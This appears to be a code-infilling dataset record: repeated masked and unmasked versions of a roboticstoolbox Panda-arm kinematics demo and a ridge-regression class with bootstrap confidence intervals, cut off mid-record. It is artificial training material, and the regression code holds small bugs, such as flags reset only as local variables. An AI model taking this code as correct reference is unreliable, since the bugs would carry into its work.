---------------------------------------------------------------------\n feature_all.loc[idx,:] = [t1,t2,t3,t4,t5,t6,t7,t8,t9,t10,t11,\n df_tmp.T.time.iloc[0],df_tmp.T.time.iloc[-1],\n df_tmp.T.recipe.iloc[0],df_tmp.T.stage.iloc[0],\n lot_last]\n \n list_tmp = []\n idx += 1\n counter = 0\n lot_last = lot_tmp\n print(row_tmp)\n \n \n \n#------------------------------------------------------------------------------\n\n\n\n\n", "step-ids": [ 0, 2, 3, 4, 5 ] }
[ 0, 2, 3, 4, 5 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> print(robot) <|reserved_special_token_0|> print(T) <|reserved_special_token_0|> print(sol.q) print(robot.fkine(sol.q)) <|reserved_special_token_0|> robot.plot(qtraj.q, movie='panda1.gif') <|reserved_special_token_0|> print(robot) <|reserved_special_token_0|> env.launch('chrome') env.add(robot) env.start_recording('panda2', 1 / dt) for qk in qtraj.q: robot.q = qk env.step() env.stop_recording() <|reserved_special_token_1|> <|reserved_special_token_0|> robot = rtb.models.DH.Panda() print(robot) T = robot.fkine(robot.qz) print(T) T = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1]) sol = robot.ikine_LMS(T) print(sol.q) print(robot.fkine(sol.q)) qtraj = rtb.jtraj(robot.qz, sol.q, 50) robot.plot(qtraj.q, movie='panda1.gif') dt = 0.05 robot = rtb.models.URDF.Panda() print(robot) env = swift.Swift() env.launch('chrome') env.add(robot) env.start_recording('panda2', 1 / dt) for qk in qtraj.q: robot.q = qk env.step() env.stop_recording() <|reserved_special_token_1|> from spatialmath import SE3 import roboticstoolbox as rtb import swift robot = rtb.models.DH.Panda() print(robot) T = robot.fkine(robot.qz) print(T) T = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1]) sol = robot.ikine_LMS(T) print(sol.q) print(robot.fkine(sol.q)) qtraj = rtb.jtraj(robot.qz, sol.q, 50) robot.plot(qtraj.q, movie='panda1.gif') dt = 0.05 robot = rtb.models.URDF.Panda() print(robot) env = swift.Swift() env.launch('chrome') env.add(robot) env.start_recording('panda2', 1 / dt) for qk in qtraj.q: robot.q = qk env.step() env.stop_recording() <|reserved_special_token_1|> # this is the example code from the t0p-level README..d from spatialmath import SE3 import roboticstoolbox as rtb import swift robot = rtb.models.DH.Panda() print(robot) T = robot.fkine(robot.qz) print(T) # IK T = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1]) sol = robot.ikine_LMS(T) # solve IK, ignore additional outputs print(sol.q) # display joint angles # FK shows that desired end-effector pose was achieved print(robot.fkine(sol.q)) qtraj = rtb.jtraj(robot.qz, sol.q, 50) robot.plot(qtraj.q, movie="panda1.gif") # URDF + Swift version dt = 0.050 # simulation timestep in seconds robot = rtb.models.URDF.Panda() print(robot) env = swift.Swift() # instantiate 3D browser-based visualizer env.launch("chrome") # activate it env.add(robot) # add robot to the 3D scene env.start_recording("panda2", 1 / dt) for qk in qtraj.q: # for each joint configuration on trajectory robot.q = qk # update the robot state env.step() # update visualization env.stop_recording() # ffmpeg -i panda2.webm -vf "scale=iw*.5:ih*.5" panda2.gif
flexible
{ "blob_id": "cc1a1491ffbcf470705aeea079faac290dbaa25e", "index": 5965, "step-1": "<mask token>\n", "step-2": "<mask token>\nprint(robot)\n<mask token>\nprint(T)\n<mask token>\nprint(sol.q)\nprint(robot.fkine(sol.q))\n<mask token>\nrobot.plot(qtraj.q, movie='panda1.gif')\n<mask token>\nprint(robot)\n<mask token>\nenv.launch('chrome')\nenv.add(robot)\nenv.start_recording('panda2', 1 / dt)\nfor qk in qtraj.q:\n robot.q = qk\n env.step()\nenv.stop_recording()\n", "step-3": "<mask token>\nrobot = rtb.models.DH.Panda()\nprint(robot)\nT = robot.fkine(robot.qz)\nprint(T)\nT = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1])\nsol = robot.ikine_LMS(T)\nprint(sol.q)\nprint(robot.fkine(sol.q))\nqtraj = rtb.jtraj(robot.qz, sol.q, 50)\nrobot.plot(qtraj.q, movie='panda1.gif')\ndt = 0.05\nrobot = rtb.models.URDF.Panda()\nprint(robot)\nenv = swift.Swift()\nenv.launch('chrome')\nenv.add(robot)\nenv.start_recording('panda2', 1 / dt)\nfor qk in qtraj.q:\n robot.q = qk\n env.step()\nenv.stop_recording()\n", "step-4": "from spatialmath import SE3\nimport roboticstoolbox as rtb\nimport swift\nrobot = rtb.models.DH.Panda()\nprint(robot)\nT = robot.fkine(robot.qz)\nprint(T)\nT = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1])\nsol = robot.ikine_LMS(T)\nprint(sol.q)\nprint(robot.fkine(sol.q))\nqtraj = rtb.jtraj(robot.qz, sol.q, 50)\nrobot.plot(qtraj.q, movie='panda1.gif')\ndt = 0.05\nrobot = rtb.models.URDF.Panda()\nprint(robot)\nenv = swift.Swift()\nenv.launch('chrome')\nenv.add(robot)\nenv.start_recording('panda2', 1 / dt)\nfor qk in qtraj.q:\n robot.q = qk\n env.step()\nenv.stop_recording()\n", "step-5": "# this is the example code from the t0p-level README..d\nfrom spatialmath import SE3\nimport roboticstoolbox as rtb\nimport swift\n\nrobot = rtb.models.DH.Panda()\nprint(robot)\nT = robot.fkine(robot.qz)\nprint(T)\n\n# IK\n\nT = SE3(0.7, 0.2, 0.1) * SE3.OA([0, 1, 0], [0, 0, -1])\nsol = robot.ikine_LMS(T) # solve IK, ignore additional outputs\nprint(sol.q) # display joint angles\n# FK shows that desired end-effector pose was achieved\nprint(robot.fkine(sol.q))\n\n\nqtraj = rtb.jtraj(robot.qz, sol.q, 50)\nrobot.plot(qtraj.q, movie=\"panda1.gif\")\n\n# URDF + Swift version\ndt = 0.050 # simulation timestep in seconds\nrobot = rtb.models.URDF.Panda()\nprint(robot)\n\nenv = swift.Swift() # instantiate 3D browser-based visualizer\nenv.launch(\"chrome\") # activate it\nenv.add(robot) # add robot to the 3D scene\nenv.start_recording(\"panda2\", 1 / dt)\nfor qk in qtraj.q: # for each joint configuration on trajectory\n robot.q = qk # update the robot state\n env.step() # update visualization\nenv.stop_recording()\n\n# ffmpeg -i panda2.webm -vf \"scale=iw*.5:ih*.5\" panda2.gif\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> class RidgeLinearModel: <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> def fit(this, x1, x2, y): this.x1 = x1 this.x2 = x2 this.y = y m = x1.shape[0] n = SumOneToN(this.k + 1) this.X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j ) * x2[i] ** j this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np. identity(n)).dot(this.X.T).dot(y) this.set_updated_to_false() <|reserved_special_token_0|> def get_RSS(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) def get_MSE(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) <|reserved_special_token_0|> <|reserved_special_token_0|> def get_CI_of_beta(this, percentile=0.95): if this.beta is None: print('Error: Model is not fitted.') return None else: if not this.CIbeta_updated: stdcoeff = st.norm.ppf((1 - percentile) / 2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this .var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this .var_vector[i]) this.CIbeta_updated = True return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False <|reserved_special_token_1|> <|reserved_special_token_0|> class RidgeLinearModel: <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> def __init__(this, lmb, k): this.lmb = lmb this.k = k def fit(this, x1, x2, y): this.x1 = x1 this.x2 = x2 this.y = y m = x1.shape[0] n = SumOneToN(this.k + 1) this.X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j ) * x2[i] ** j this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np. identity(n)).dot(this.X.T).dot(y) this.set_updated_to_false() def predict(this, x1, x2): if this.beta is None: print('Error: Model is not fitted.') return None else: y = np.ones(x1.shape) * this.beta[0] for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j ) * x2 ** j return y def get_RSS(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) def get_MSE(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) def get_R2Score(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return R2Score(y, y_tilde) def get_variance_of_betas(this, B=20): m = len(this.x1) n = SumOneToN(this.k + 1) betasamples = np.zeros((n, B)) for b in range(B): c = np.random.choice(len(this.x1), len(this.x1)) s_x1 = this.x1[c] s_x2 = this.x2[c] s_y = this.y[c] if len(s_y.shape) == 1: s_y = np.expand_dims(this.y[c], axis=1) s_X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j ) * s_x2[i] ** j betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb * np.identity(n)).dot(s_X.T).dot(s_y)[:, 0] betameans = betasamples.sum(axis=1, keepdims=True) / B this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B return this.var_vector def get_CI_of_beta(this, percentile=0.95): if this.beta is None: print('Error: Model is not fitted.') return None else: if not this.CIbeta_updated: stdcoeff = st.norm.ppf((1 - percentile) / 2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this .var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this .var_vector[i]) this.CIbeta_updated = True return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False <|reserved_special_token_1|> <|reserved_special_token_0|> class RidgeLinearModel: covariance_matrix = None covariance_matrix_updated = False beta = None var_vector = None var_vector_updated = False CIbeta = None CIbeta_updated = False x1 = None x2 = None y = None y_tilde = None y_tilde_updated = False def __init__(this, lmb, k): this.lmb = lmb this.k = k def fit(this, x1, x2, y): this.x1 = x1 this.x2 = x2 this.y = y m = x1.shape[0] n = SumOneToN(this.k + 1) this.X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j ) * x2[i] ** j this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np. identity(n)).dot(this.X.T).dot(y) this.set_updated_to_false() def predict(this, x1, x2): if this.beta is None: print('Error: Model is not fitted.') return None else: y = np.ones(x1.shape) * this.beta[0] for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j ) * x2 ** j return y def get_RSS(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) def get_MSE(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) def get_R2Score(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return R2Score(y, y_tilde) def get_variance_of_betas(this, B=20): m = len(this.x1) n = SumOneToN(this.k + 1) betasamples = np.zeros((n, B)) for b in range(B): c = np.random.choice(len(this.x1), len(this.x1)) s_x1 = this.x1[c] s_x2 = this.x2[c] s_y = this.y[c] if len(s_y.shape) == 1: s_y = np.expand_dims(this.y[c], axis=1) s_X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j ) * s_x2[i] ** j betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb * np.identity(n)).dot(s_X.T).dot(s_y)[:, 0] betameans = betasamples.sum(axis=1, keepdims=True) / B this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B return this.var_vector def get_CI_of_beta(this, percentile=0.95): if this.beta is None: print('Error: Model is not fitted.') return None else: if not this.CIbeta_updated: stdcoeff = st.norm.ppf((1 - percentile) / 2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this .var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this .var_vector[i]) this.CIbeta_updated = True return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False <|reserved_special_token_1|> from utilities import SumOneToN, RSS, MSE, R2Score import numpy as np import scipy.stats as st class RidgeLinearModel: covariance_matrix = None covariance_matrix_updated = False beta = None var_vector = None var_vector_updated = False CIbeta = None CIbeta_updated = False x1 = None x2 = None y = None y_tilde = None y_tilde_updated = False def __init__(this, lmb, k): this.lmb = lmb this.k = k def fit(this, x1, x2, y): this.x1 = x1 this.x2 = x2 this.y = y m = x1.shape[0] n = SumOneToN(this.k + 1) this.X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j ) * x2[i] ** j this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np. identity(n)).dot(this.X.T).dot(y) this.set_updated_to_false() def predict(this, x1, x2): if this.beta is None: print('Error: Model is not fitted.') return None else: y = np.ones(x1.shape) * this.beta[0] for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j ) * x2 ** j return y def get_RSS(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) def get_MSE(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) def get_R2Score(this, x1, x2, y): if this.beta is None: print('Error: Model is not fitted.') return None else: y_tilde = this.predict(x1, x2) return R2Score(y, y_tilde) def get_variance_of_betas(this, B=20): m = len(this.x1) n = SumOneToN(this.k + 1) betasamples = np.zeros((n, B)) for b in range(B): c = np.random.choice(len(this.x1), len(this.x1)) s_x1 = this.x1[c] s_x2 = this.x2[c] s_y = this.y[c] if len(s_y.shape) == 1: s_y = np.expand_dims(this.y[c], axis=1) s_X = np.ones((m, n)) for i in range(m): for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j ) * s_x2[i] ** j betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb * np.identity(n)).dot(s_X.T).dot(s_y)[:, 0] betameans = betasamples.sum(axis=1, keepdims=True) / B this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B return this.var_vector def get_CI_of_beta(this, percentile=0.95): if this.beta is None: print('Error: Model is not fitted.') return None else: if not this.CIbeta_updated: stdcoeff = st.norm.ppf((1 - percentile) / 2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this .var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this .var_vector[i]) this.CIbeta_updated = True return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False <|reserved_special_token_1|> from utilities import SumOneToN, RSS, MSE, R2Score import numpy as np import scipy.stats as st class RidgeLinearModel: covariance_matrix = None # covariance matrix of the model coefficients covariance_matrix_updated = False beta = None # coefficients of the modelfunction var_vector = None var_vector_updated = False CIbeta = None # confidence interval of betas CIbeta_updated = False x1 = None # first predictor of sampledata x2 = None # second predictor of sampledata y = None # responses of sampledata y_tilde = None # model predictions for x y_tilde_updated = False def __init__(this, lmb, k): this.lmb = lmb # set lambda of model this.k = k # set order of polynomial # This function fits the model to the the sample data # using Ridge regression # # @x: array containing predictors # @y: array containing responses # @k: the degree of the polynomial to be fitted to the sample data # @lmb: lambda, determines the emphasize on minimizing the variance # of the model # def fit(this, x1, x2, y): # store x ands y for later computations this.x1 = x1 this.x2 = x2 this.y = y # calculate the dimensions of the design matrix m = x1.shape[0] n = SumOneToN(this.k + 1) # allocate design matrix this.X = np.ones((m, n)) # compute values of design matrix for i in range(m): # vectoriser denne løkka for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): this.X[i][SumOneToN(p + 1) + j] *= x1[i]**(p + 1 - j)*x2[i]**j # compute linear regression coefficients this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb*np.identity(n)).dot(this.X.T).dot(y) # stored statistical parameters are no longer valid this.set_updated_to_false() # Predicts and returns the responses of the predictors with # the fitted model if the model is fitted # # @x1: Columnvector containing the first predictor values # @x2: Columnvector containing the second predictor values # def predict(this, x1, x2): if this.beta is None: print("Error: Model is not fitted.") return None else: # allocate meshgrid filled with constant term y = np.ones(x1.shape)*this.beta[0] # compute function values for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): y += this.beta[SumOneToN(p + 1) + j]*x1**(p+1-j)*x2**j return y # Returns the residuals of the model squared and summed def get_RSS(this, x1, x2, y): if this.beta is None: print("Error: Model is not fitted.") return None else: y_tilde = this.predict(x1, x2) return RSS(y, this.y_tilde) # Returns the mean squared error of the model # given the sample data (x1, x2, y) # # @x1: vector of first predictor # @x2: vector of second predictor # @y: vector of responses # def get_MSE(this, x1, x2, y): if this.beta is None: print("Error: Model is not fitted.") return None else: y_tilde = this.predict(x1, x2) return MSE(y, y_tilde) # Returns the R2 score of the model def get_R2Score(this, x1, x2, y): if this.beta is None: print("Error: Model is not fitted.") return None else: y_tilde = this.predict(x1, x2) return R2Score(y, y_tilde) # Computes the sample variance of the coefficients of the model # @B: The number of samples used def get_variance_of_betas(this, B=20): m = len(this.x1) n = SumOneToN(this.k + 1) betasamples = np.zeros((n, B)) for b in range(B): # create bootstrapsample c = np.random.choice(len(this.x1), len(this.x1)) s_x1 = this.x1[c] s_x2 = this.x2[c] s_y = this.y[c] # Next line fixes if y is one-dimensional if (len(s_y.shape)) == 1: s_y = np.expand_dims(this.y[c], axis=1) # allocate design matrix s_X = np.ones((m, n)) # compute values of design matrix for i in range(m): # vectoriser denne løkka for p in range(this.k): for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)): s_X[i][SumOneToN(p + 1) + j] *= s_x1[i]**(p + 1 - j)*s_x2[i]**j betasamples[:,b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb*np.identity(n)).dot(s_X.T).dot(s_y)[:, 0] betameans = betasamples.sum(axis=1, keepdims=True)/B # Compute variance vector this.var_vector = np.sum((betasamples - betameans)**2, axis=1)/B return this.var_vector # Returns the confidence interval of the betas def get_CI_of_beta(this, percentile=.95): if this.beta is None: print("Error: Model is not fitted.") return None else: if not this.CIbeta_updated: # stdcoeff is the z-score to the two-sided confidence interval stdcoeff = st.norm.ppf((1-percentile)/2) this.CI_beta = np.zeros((len(this.beta), 2)) for i in range(len(this.beta)): this.CI_beta[i][0] = this.beta[i] + stdcoeff*np.sqrt(this.var_vector[i]) this.CI_beta[i][1] = this.beta[i] - stdcoeff*np.sqrt(this.var_vector[i]) this.CIbeta_updated = True # CI_beta returns a nx2 matrix with each row # representing the confidence interval to the corresponding beta return this.CI_beta def set_updated_to_false(this): covariance_matrix_updated = False var_vector_updated = False y_tilde_updated = False CIbeta_updated = False
flexible
{ "blob_id": "a5dcc66ece4e58995fe86c3a399c45975a596b1a", "index": 5836, "step-1": "<mask token>\n\n\nclass RidgeLinearModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def fit(this, x1, x2, y):\n this.x1 = x1\n this.x2 = x2\n this.y = y\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n this.X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j\n ) * x2[i] ** j\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np.\n identity(n)).dot(this.X.T).dot(y)\n this.set_updated_to_false()\n <mask token>\n\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n <mask token>\n <mask token>\n\n def get_CI_of_beta(this, percentile=0.95):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n if not this.CIbeta_updated:\n stdcoeff = st.norm.ppf((1 - percentile) / 2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CIbeta_updated = True\n return this.CI_beta\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-2": "<mask token>\n\n\nclass RidgeLinearModel:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(this, lmb, k):\n this.lmb = lmb\n this.k = k\n\n def fit(this, x1, x2, y):\n this.x1 = x1\n this.x2 = x2\n this.y = y\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n this.X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j\n ) * x2[i] ** j\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np.\n identity(n)).dot(this.X.T).dot(y)\n this.set_updated_to_false()\n\n def predict(this, x1, x2):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y = np.ones(x1.shape) * this.beta[0]\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j\n ) * x2 ** j\n return y\n\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n\n def get_R2Score(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return R2Score(y, y_tilde)\n\n def get_variance_of_betas(this, B=20):\n m = len(this.x1)\n n = SumOneToN(this.k + 1)\n betasamples = np.zeros((n, B))\n for b in range(B):\n c = np.random.choice(len(this.x1), len(this.x1))\n s_x1 = this.x1[c]\n s_x2 = this.x2[c]\n s_y = this.y[c]\n if len(s_y.shape) == 1:\n s_y = np.expand_dims(this.y[c], axis=1)\n s_X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j\n ) * s_x2[i] ** j\n betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb *\n np.identity(n)).dot(s_X.T).dot(s_y)[:, 0]\n betameans = betasamples.sum(axis=1, keepdims=True) / B\n this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B\n return this.var_vector\n\n def get_CI_of_beta(this, percentile=0.95):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n if not this.CIbeta_updated:\n stdcoeff = st.norm.ppf((1 - percentile) / 2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CIbeta_updated = True\n return this.CI_beta\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-3": "<mask token>\n\n\nclass RidgeLinearModel:\n covariance_matrix = None\n covariance_matrix_updated = False\n beta = None\n var_vector = None\n var_vector_updated = False\n CIbeta = None\n CIbeta_updated = False\n x1 = None\n x2 = None\n y = None\n y_tilde = None\n y_tilde_updated = False\n\n def __init__(this, lmb, k):\n this.lmb = lmb\n this.k = k\n\n def fit(this, x1, x2, y):\n this.x1 = x1\n this.x2 = x2\n this.y = y\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n this.X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j\n ) * x2[i] ** j\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np.\n identity(n)).dot(this.X.T).dot(y)\n this.set_updated_to_false()\n\n def predict(this, x1, x2):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y = np.ones(x1.shape) * this.beta[0]\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j\n ) * x2 ** j\n return y\n\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n\n def get_R2Score(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return R2Score(y, y_tilde)\n\n def get_variance_of_betas(this, B=20):\n m = len(this.x1)\n n = SumOneToN(this.k + 1)\n betasamples = np.zeros((n, B))\n for b in range(B):\n c = np.random.choice(len(this.x1), len(this.x1))\n s_x1 = this.x1[c]\n s_x2 = this.x2[c]\n s_y = this.y[c]\n if len(s_y.shape) == 1:\n s_y = np.expand_dims(this.y[c], axis=1)\n s_X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j\n ) * s_x2[i] ** j\n betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb *\n np.identity(n)).dot(s_X.T).dot(s_y)[:, 0]\n betameans = betasamples.sum(axis=1, keepdims=True) / B\n this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B\n return this.var_vector\n\n def get_CI_of_beta(this, percentile=0.95):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n if not this.CIbeta_updated:\n stdcoeff = st.norm.ppf((1 - percentile) / 2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CIbeta_updated = True\n return this.CI_beta\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-4": "from utilities import SumOneToN, RSS, 